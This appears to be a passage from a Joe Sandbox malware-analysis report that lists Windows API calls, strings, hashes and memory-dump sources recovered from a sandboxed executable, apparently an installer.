• Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
• Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
• Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
• Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
• FlushFileBuffers.KERNEL32(?), ref: 0045C499
Strings
• NumRecs range exceeded, xrefs: 0045C396
• EndOffset range exceeded, xrefs: 0045C3CD
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: File$BuffersFlush
• String ID: EndOffset range exceeded$NumRecs range exceeded
• API String ID: 3593489403-659731555
• Opcode ID: 801dcd038e335b265826125cf8ff6a7c252aa7dfa969982b1ed0869fe0f6d4ae
• Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
• Opcode Fuzzy Hash: 801dcd038e335b265826125cf8ff6a7c252aa7dfa969982b1ed0869fe0f6d4ae
• Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
  • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
  • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
  • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
  • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
  • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
  • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
  • Part of subcall function 004063C4: 6F571CD0.COMCTL32(00498BC5), ref: 004063C4
  • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
  • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
  • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
  • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
  • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
  • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
  • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
  • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
  • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
  • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
  • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
  • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
  • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
  • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
  • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
  • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
  • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
  • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
• SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
  • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
  • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
  • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
  • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
• ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
  • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorF571FormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
• String ID: Setup
• API String ID: 3527831634-3839654196
• Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
• Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                                                                                  • String ID: $=H
                                                                                                                                                                                                                                  • API String ID: 3660427363-3538597426
                                                                                                                                                                                                                                  • Opcode ID: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                                                                                                                                                  • Instruction ID: 5bd1c55a509b6dee259ffcee94d68868fe84ce326e73fb4cf6662c4527ef549e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b62dc44b296d1c54c0416b8d239270b5fe200a79a82432283709fd1da487490f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D414171E00529ABDB11DF95D881BAFB7B8EB04704F918466E810F7241D778AE00CBA5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A6A
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,?,00000000,00453B13,?,?,00000000,0049B628,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00453A73
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateDirectoryErrorLast
                                                                                                                                                                                                                                  • String ID: .tmp
                                                                                                                                                                                                                                  • API String ID: 1375471231-2986845003
                                                                                                                                                                                                                                  • Opcode ID: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                                                                                                                                                  • Instruction ID: 2c169793aa1d4e8b0ae54453200dd0eeecd34c8d921a2c5b894f13e1de3ec917
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f6049b6d10a737b279f92eac6e2edda550f3c0c3ab583747f9ca22f4cbd9d09
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD213575A002089BDB01EFA5C8429DEB7B8EF49305F50457BE801B7343DA3CAF058B69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00483A8D
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00483A9A
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483AA8
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483AB0
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 00483ABC
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 00483ADD
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483AF0
                                                                                                                                                                                                                                    • Part of subcall function 00483A7C: GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483AF6
                                                                                                                                                                                                                                    • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483DB6
                                                                                                                                                                                                                                    • Part of subcall function 00483DA8: GetVersionExA.KERNEL32(0000009C,?,00483FBA,00000000,0048408F,?,?,?,?,?,00498C29), ref: 00483E08
                                                                                                                                                                                                                                    • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                                                                                                                                                    • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModuleVersion$CurrentErrorInfoLibraryLoadModeNativeProcessSystem
                                                                                                                                                                                                                                  • String ID: SHGetKnownFolderPath$shell32.dll
                                                                                                                                                                                                                                  • API String ID: 3869789854-2936008475
                                                                                                                                                                                                                                  • Opcode ID: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                                                                                                                                                  • Instruction ID: 8066e8dcbdf9c94243579ba2519058cd674f052446347c20ec70bbddfecd8a90
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24bfbd8baf235fcbd7404033d7799f009542697b8823181e059981251f96c700
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1021F1B06103116AC700BFBE599611B3BA5EB9570C380893FF904DB391D77E68149B6E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                  • String ID: T$H
                                                                                                                                                                                                                                  • API String ID: 2018770650-488339322
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,0047C92C,00000000,0047C942), ref: 0047C63A
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Close
• String ID: RegisteredOrganization$RegisteredOwner
• API String ID: 3535843008-1113070880
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475271
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000000,?,00475483), ref: 00475288
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseCreateErrorFileHandleLast
• String ID: CreateFile
• API String ID: 2528220319-823142352
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Open
• String ID: System\CurrentControlSet\Control\Windows$;H
• API String ID: 71445658-2565060666
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00457044: CoInitialize.OLE32(00000000), ref: 0045704A
  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
• GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressErrorInitializeLibraryLoadModeProc
• String ID: SHCreateItemFromParsingName$shell32.dll
• API String ID: 2906209438-2320870614
Uniqueness
                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
  • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
• GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressErrorLibraryLoadModeProc
• String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                                                                                                                                                  • API String ID: 2492108670-2683653824
                                                                                                                                                                                                                                  • Opcode ID: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                                                                                                                                                  • Instruction ID: c0603f0a452a360a01ce82207306765f02b8a986224f2e77b24b084cc810d505
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f35c33f472421c4948a2ce6cac4f72f28d005e98571f32e7a9733a845a9f857
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44B092A060074086DB40B7A298D262B28269740319B20843BB0CC9BA95EB3E88240B9F
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00448709), ref: 0044864C
• GetProcAddress.KERNEL32(00000000,00000000), ref: 004486CD
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID:
• API String ID: 2574300362-0
• Opcode ID: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
• Instruction ID: 2eaa58f6359003fef9dee836e3db1fa56ae38c906bc4f4c4d93ca6671f7cd4fb
• Opcode Fuzzy Hash: 36521cdfc13aba0ae9c44214f12a2e14552a0dd36018004eb1372d311063bccb
• Instruction Fuzzy Hash: 14515470E00105AFDB40EF95C491AAEBBF9EB45319F11817FE414BB391DA389E05CB99
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetSystemMenu.USER32(00000000,00000000,00000000,00481DB4), ref: 00481D4C
• AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00481D5D
• AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00481D75
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Menu$Append$System
• String ID:
• API String ID: 1489644407-0
• Opcode ID: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
• Instruction ID: 44f8b16540ed1c6eecf525242fd074403e334eda66194076213ef08da8c10300
• Opcode Fuzzy Hash: 672145a2bbc7660003845448dd8fd579fca208d3c81716cd1fbd69936c4767aa
• Instruction Fuzzy Hash: 3431D4307043441AD721FB769C82BAE3A989F15318F54483FF901AB2E3CA7CAD09879D
Uniqueness
• Uniqueness Score: -1.00%

APIs
• PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00424412
• TranslateMessage.USER32(?), ref: 0042448F
• DispatchMessageA.USER32(?), ref: 00424499
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Message$DispatchPeekTranslate
• String ID:
• API String ID: 4217535847-0
• Opcode ID: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
• Instruction ID: 8eae6dca0d2455523dd27ca57e4683f6da326f6f2f90499d04ddbfd693f83f9d
• Opcode Fuzzy Hash: d4f7142ddfb2041a0388c754ad29f8297397d1c5d5a6fc901d04af05902ad934
• Instruction Fuzzy Hash: E3116D303043205AEB20FA24A941B9F73D4DFC5758F80481EFC99972C2D77D9D49879A
Uniqueness
• Uniqueness Score: -1.00%

APIs
• SetPropA.USER32(00000000,00000000), ref: 0041666A
• SetPropA.USER32(00000000,00000000), ref: 0041667F
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,00000000,00000000,?,00000000,00000000), ref: 004166A6
Memory Dump Source
